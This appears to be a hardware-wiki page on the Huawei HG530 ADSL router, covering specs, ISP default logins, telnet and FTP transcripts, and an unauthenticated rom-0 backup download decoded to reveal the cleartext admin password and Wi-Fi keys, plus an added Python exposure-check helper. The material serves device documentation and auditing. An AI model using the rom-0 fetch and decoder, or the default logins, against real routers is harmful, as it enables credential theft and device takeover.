Huawei HG530
Country of manuf.: China
Type: wireless router, dsl modem
FCC ID: QISHG530
Power: 12 VDC, 0.5 A
Connector type: barrel
CPU1: TrendChip TC3162U
FLA1: 2 MiB (Macronix MX25L1606E)
RAM1: 8 MiB (EtronTech EM638165TS-6G)
Expansion IFs: none specified
WI1 chip1: Ralink RT3390
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL
ETH chip1: TrendChip TC3162U
Switch: TrendChip TC2206F
LAN speed: 100M
LAN ports: 4
Additional chips
DSL (ADSL2+) AFE: TrendChip TC3086 (markings: TRENDCHIP, TC3086-QFN64-EPG, C2W49800, TP1130B5), quantity 1
Stock FW OS: ZyNOS
Flags: ADSL2+
Default IP address: 192.168.1.1
the IP 192.168.1.1 is used by 1304 additional devices
of which 16 are Huawei devices
Default login user: admin
Default login password: admin
admin:admin credentials used by 1327 additional devices
of which 15 are Huawei devices
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
For a list of all currently documented TrendChip chipsets with specifications, see TrendChip.
Huawei HG530 - Wireless ADSL Modem Router
Router is labeled: "bg Wi-Fi certified, with some n features". It is a draft-n router, compatible with 802.11n standard.
Same chipset as ZyXEL P-660HN-TxA (T1A, T3A), Billion BiPAC 5200W (Manual), and D-Link DSL-2680 rev A1 (2 LAN ports only).
Additional external links
Manuals
Firmware
Components
Command Line
- (selection of ZyXEL devices as no matching Huawei CLI guide found)
- Prestige 334w CI Command List
- CLI Reference Guide Version 3.70
- CLI Reference Guide Versions: 3.79, 3.80, 3.90, 4.00
- ZyNOS CI and BootBase Commands (ZyNOS 1999)
- Using the console port
Router login
The HG530 supports 3 different user names; login is possible by using the following protocols.
- Web interface: http
- Console login: telnet
- File transfer: ftp
Default login user & password
The HG530 was often distributed as a custom-branded version by ISPs such as Telmex or Claro
(both ISPs in the Latin America region) with non-standard login user/password combinations.
The pictures below show a Claro branded router with admin defaults found here (tested),
while defaults for user2 and user3 were extracted from the rom-0 backup file (tested):
• login user & password |
---|
Claro Dominican Republic instructions suggest (untested):
Telmex branded router according to firmware update instructions (untested):
Other likely user/password combinations as found here and here (untested):
or
|
Telnet
Opens a session with the ZyNOS CI. All users (admin, user) have full privileges!
• telnet

```
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

Username: admin
Password: ********
Copyright (c) 2001 - 2011 Huawei

HG530> help
Valid commands are:
sys             exit            ether           wan
etherdbg        tcephydbg       ip              bridge
dot1q           pktqos          show            set
lan

HG530> sys
modfTTL         edit            feature         hostname
log             resetlog        stdio           syslog
version         view            wdog            romreset
factoryreset    atssid          atwpakey        atwepkey
acl             keytest         atsh            diag
routeip         bridge          save            display
password        default         batchnumber     versionstyle
versionM        multiuser       password2nd     username2nd
deleteUser      getusername2nd  password3rd     username3rd
delete3rdUser   getusername3rd  adminname       modelcheck
attainrateflag  pswauthen       setser          resetbtntime
setdefaultlanip fwuptimeout     sptromsize      syncinterval
tcpdebug        cwmp            socket          filter
cpu
```
• sys version

```
HG530> sys version
RAS version: V100R001C10B023 SALVADOR
RAS version(web): V100R001B023 SALVADOR 2011/04/27
System ID: $5.1.54.0(RUE0.C2)3.12.8.20 20110407_V001 [Apr 07 2011 15:06:42]
romRasSize: 1357172
system up time: 2:03:49 (b5601 ticks)
bootbase version: VTC_SPI1.11 | 2011/03/11

HG530> sys atsh
RAS version : V100R001B023 SALVADOR
romRasSize : 1363726
bootbase version : VTC_SPI1.13 | 2011/10/13
Product Model : Home Gateway
MAC Address : ACE87B008C88
Default Country Code : FF
Boot Module Debug Flag : 00
RomFile Version : 01
RomFile Checksum : d396
RAS F/W Checksum : 5685
SNMP MIB level & OID : 050000000100000002000000030000000400000005
Main Feature Bits : 86
Other Feature Bits : 93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00

HG530> sys getusername2nd
secondUserName: usuario

HG530> sys getusername3rd
thirdUserName: user
```
FTP
Gives write-only access to the firmware, and read/write access to the rom-0 backup file.
- Only user admin is allowed to login!
• ftp

```
$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 HG530 FTP version 1.0 ready at Sat Jan 01 05:50:34 2000
Name (192.168.1.1:john): admin
331 Enter PASS command
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 Port command okay
150 Opening data connection for LIST
--w--w--w- 1 owner group 1363726 Jul 01 12:00 ras
-rw-rw-rw- 1 owner group 131072 Jul 01 12:00 rom-0
?226 File sent OK

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 HG530 FTP version 1.0 ready at Sat Jan 01 02:08:30 2000
Name (192.168.1.1:john): user
530 User user cannot log in.
Login failed.
```
Vulnerabilities
rom-0
Like many other ZyNOS-based devices, the HG530 allows downloading the configuration backup file rom-0 without any authentication.
http://192.168.1.1/rom-0
The rom-0 file is LZS compressed (see reverse engineering the zyxel configuration backup file and static analysis).
- The Java-based rom-0 decoder from GitHub reveals the cleartext login password, SSID and WEP key.

```
$ java -jar rom0.jar rom-0
.l.password.HG530.u.public.a.dhcpp.192.43.244.18.P.E.5.user.Turbonett.@.l.password.HG530.u.public.l.password.HG530.u.`.L.2`ISP-0.{. .turbonett.RN.}.d.-.@.@.L.0. .d.B.RN.w`.{.0.@.0.@.$.L.Q.'P.dhcppc.}.d.+.*.HG520.d. .$.(.0.SUA.8.P.Z.d. .$.A.^.>._=. .H. TURBONETT_008C88.d.+.*.74E75C4CDB.3.".%.@!.dd.d.RT3390_2.A.^.>._=.3. .H. TURBONETT_008C88.d.+.*.4.4.vlan14.5.C!.(.(.1`.W$h.(.(.1`.W$h.$.@.@usuario.%.Q.{/tr069.H.wei Technologies Co., Ltd.HG530.00E0FC.HG530TRA.0.1-.T.:.Z.4.33_4.0.H.0.Wf.
```
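To confirm whether a device you administer still serves rom-0 without authentication, the following audit helper requests the path given above with no credentials and classifies the answer. It is an added example, not code from this page or from any of the linked projects; the function names, the three verdict strings and the "mostly non-text bytes" heuristic for recognising a compressed backup are assumptions of this example.

```python
import sys
import urllib.error
import urllib.request

ROM0_PATH = "/rom-0"  # path from this page; everything else here is illustrative


def classify_rom0_response(status, headers, body):
    """Classify one unauthenticated HTTP response for /rom-0.

    headers: dict with lower-case keys; body: first bytes of the response.
    Returns 'exposed', 'not exposed' or 'inconclusive'.
    """
    if status in (401, 403, 404):
        return "not exposed"  # credentials demanded, refused, or not served
    if status != 200 or not body:
        return "inconclusive"
    head = body[:512].lstrip().lower()
    if "text/html" in headers.get("content-type", "").lower() \
            or head.startswith((b"<!doctype", b"<html")):
        return "not exposed"  # login form or error page sent with 200
    # Assumption: a compressed backup image is mostly non-text bytes.
    sample = body[:512]
    nontext = sum(b < 9 or 13 < b < 32 or b > 126 for b in sample)
    return "exposed" if nontext / len(sample) > 0.10 else "inconclusive"


def fetch_rom0(host, timeout=5.0):
    """GET http://<host>/rom-0 with no Authorization header or cookies."""
    url = "http://%s%s" % (host, ROM0_PATH)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            hdrs = {k.lower(): v for k, v in resp.headers.items()}
            return resp.status, hdrs, resp.read(4096)
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a verdict
        return err.code, {k.lower(): v for k, v in err.headers.items()}, b""


def audit(host):
    """Return the verdict for a device you administer."""
    return classify_rom0_response(*fetch_rom0(host))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    print(target, audit(target))
```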
TBD: Credential disclosure in modems Huawei HG510, HG520x, HG530 and possibly others [1] [2] [3] [4] [5]
Images
from User:Zerohero
P.S. Other pictures [6] [7] do show a 3rd on-board switching regulator.